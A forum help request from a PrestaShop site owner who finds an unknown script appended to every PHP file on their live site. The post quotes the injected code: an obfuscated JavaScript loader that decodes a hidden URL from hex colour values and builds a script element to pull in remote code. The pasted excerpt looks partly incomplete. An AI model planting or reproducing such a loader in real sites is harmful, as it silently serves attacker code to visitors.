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cross scripting issue


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Hello ppl,



I need a urgent help as my live website is having some issue.

each and every file(.php) of prestashop is appended (at the end of the file) a script is written i don't know how. when i uploaded these scripts where not there please help.

Script is as below



function vdch() {

if(document.all.length > 3) {

var t = new Array('#6a7072', '#723e29', '#2d7371', '#752a62', '#637d65', '#6d2a60', '#702b63', '#7a7029');

var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } }

var dch = document.createElement("script");

dch.id = "dchid";

dch.src = dchid;


} else {



} setTimeout("vdch()",500);

</script> "

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